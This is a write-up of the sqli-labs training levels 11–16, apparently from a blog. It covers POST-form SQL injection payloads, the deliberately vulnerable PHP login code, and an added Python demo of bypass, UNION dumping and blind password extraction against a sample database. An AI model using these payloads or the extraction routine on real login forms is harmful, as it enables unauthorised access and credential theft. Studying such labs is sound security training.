[Sqli-labs] Breakthrough records 11~16

[Less-11] POST method injection based on '

1. Test process

  • Try the universal password first
    1' or 1=1#
    [image-20210309165743460]
    [image-20210309165843053]

    As the figure shows, the login succeeds: the quote closes the username string, "or 1=1" makes the WHERE clause true for every row, and "#" comments out the rest of the statement, so the password is never checked.

  • Capture the POST request with Burp and replay it

    Payload 1' order by 5# and its echo:
    [image-20210309170247337] [image-20210309170316162]

    ORDER BY n only errors once n exceeds the number of columns in the SELECT, and this level prints the MySQL error, so the boundary can be found by binary search (the "dichotomy" of the original); the main query turns out to have 2 columns.

    Query the basic information of the database. Payload and echo:
    [image-20210309170835504] [image-20210309170849629]

    The remaining steps (table names, column names, column values) are the same as in the earlier levels and are not repeated here.

2. Source code analysis

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	$uname=$_POST['uname'];
	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	//(the submitted username and password are appended to result.txt in plaintext)
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname);
	fwrite($fp,'Password:'.$passwd."\n");
	fclose($fp);

	// connectivity
	// The POST parameters receive no handling at all and are concatenated straight
	// into the SQL statement, so there is an obvious SQL injection vulnerability.
	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
		//echo '<font color= "#0000ff">';
		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';
		echo "<br>";
		// the queried row is echoed back: this is the echo that UNION injection rides on
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';
		echo "</font>";
	}
	else
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		// the raw MySQL error is printed to the page; this is the error echo that the
		// ORDER BY test and error-based injection rely on (it is removed in Less-15/16)
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg" />';
		echo "</font>";
	}
}

?>

[Less-12] POST method injection based on ")

Apart from the different closing, this level is the same as the previous one: both the universal password and Burp capture-and-replay succeed.

[image-20210309173505254]

[Less-13] POST method injection based on ')

Apart from the different closing, this level is the same as the previous one: both the universal password and Burp capture-and-replay succeed.

[image-20210309173400177]

[Less-14] POST method injection based on "

Apart from the different closing, this level is the same as the previous one: both the universal password and Burp capture-and-replay succeed.

Testing the closing, then logging in with the universal password:
[image-20210309173918574] [image-20210309174007807]

[Less-15] POST method injection based on ' (no error echo)

Apart from the different closing, this level also turns off the error echo (the MySQL error message is no longer displayed), which makes the closing harder to identify. It can still be found by trying each closing in turn: only the right one makes the universal password log in. Both the universal password and capture-and-replay succeed.

[image-20210309174611588]

[Less-16] POST method injection based on ") (no error echo)

Apart from the different closing, this level also turns off the error echo (the MySQL error message is no longer displayed), which makes the closing harder to identify. It can still be found by trying each closing in turn: only the right one makes the universal password log in. Both the universal password and capture-and-replay succeed.


To sum up:

From Less-11 to Less-16 the universal password logs in at every level; only the closing differs [', "), '), "].

Getting the administrator password:

Less-11 and Less-12 echo the queried username and password, so UNION injection works directly (same logic as the earlier GET levels).

Less-13 and Less-14 echo the MySQL error message, so error-based injection can be used.

Less-15 and Less-16 give only two responses (login success or failure), so blind injection has to be used.
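The procedure above (universal password, ORDER BY binary search, UNION dump for Less-11/12, and the two-state blind extraction that Less-15/16 force) as one runnable added example. This is not code from the original post or from sqli-labs: the vulnerable query is re-created over an in-memory sqlite3 table with constructed sample rows, MySQL's "#" comment is replaced by "-- " (trailing space) because sqlite3 does not recognise "#", and the parameterised safe_login is shown beside it as the fix.

```python
"""Added example, not code from the original post: the Less-11 login query
re-created over an in-memory sqlite3 table so the write-up's steps (universal
password, ORDER BY binary search, UNION dump, Less-15 style blind extraction)
run offline. MySQL's '#' comment is replaced by '-- ' (trailing space) because
sqlite3 does not recognise '#'. Sample rows are constructed for the demo."""
import sqlite3

SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, uname, passwd, quote="'", close="'"):
    """Same concatenation as the PHP in the post. quote/close model the closing
    style: ("'", "'") for Less-11/15, ("('", "')") for Less-13.
    Returns (row, error_text); error_text is what print_r(mysql_error()) leaks."""
    sql = (f"SELECT username, password FROM users WHERE username={quote}{uname}{close} "
           f"and password={quote}{passwd}{close} LIMIT 1")
    try:
        return conn.execute(sql).fetchone(), None
    except sqlite3.Error as exc:
        return None, str(exc)


def safe_login(conn, uname, passwd):
    """Hardened form: input is bound as a parameter, never spliced into the SQL text."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 1",
        (uname, passwd)).fetchone()


def column_count(order_by_ok, hi=32):
    """Binary search (the post's 'dichotomy') for the largest n such that
    'ORDER BY n' does not raise an error; that n is the column count."""
    lo = 1
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if order_by_ok(mid):
            lo = mid
        else:
            hi = mid - 1
    return lo


def blind_value(greater_than, hi):
    """Recover an integer x in [0, hi] from a true/false oracle answering
    'x > v': the only signal Less-15/16 give (login success vs. failure)."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def demo():
    conn = make_db()
    out = {}
    # 1. Universal password: the tautology is true for every row and the comment
    #    removes the password check (Less-11 closing, then the Less-13 closing).
    out["universal_11"] = vulnerable_login(conn, "1' or 1=1-- ", "x")[0]
    out["universal_13"] = vulnerable_login(conn, "1') or 1=1-- ", "x", "('", "')")[0]
    # 2. Column count: ORDER BY n errors once n exceeds the SELECT list (needs error echo).
    out["columns"] = column_count(
        lambda n: vulnerable_login(conn, f"1' order by {n}-- ", "x")[1] is None)
    # 3. UNION the admin row into the echoed username/password fields (Less-11/12).
    out["union"] = vulnerable_login(
        conn, "-1' union select username, password from users where username='admin'-- ", "x")[0]
    # 4. Less-15/16: no echo, no error text, only logged-in or not. Ask yes/no
    #    questions about the admin password and rebuild it one character at a time.
    def admin_pw_gt(expr, v):
        row, _ = vulnerable_login(
            conn, f"-1' or (select {expr} from users where username='admin') > {v}-- ", "x")
        return row is not None
    length = blind_value(lambda v: admin_pw_gt("length(password)", v), 64)
    out["blind"] = "".join(
        chr(blind_value(lambda v, p=p: admin_pw_gt(f"unicode(substr(password,{p},1))", v), 127))
        for p in range(1, length + 1))
    # 5. The parameterised query treats the same payload as a literal username.
    out["safe"] = safe_login(conn, "1' or 1=1-- ", "x")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running the script prints one line per step; the blind step needs roughly seven requests per character, which is why the write-up reserves it for Less-15/16, where neither the row nor the error message is echoed.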

Source: blog.csdn.net/qq_43665434/article/details/114595421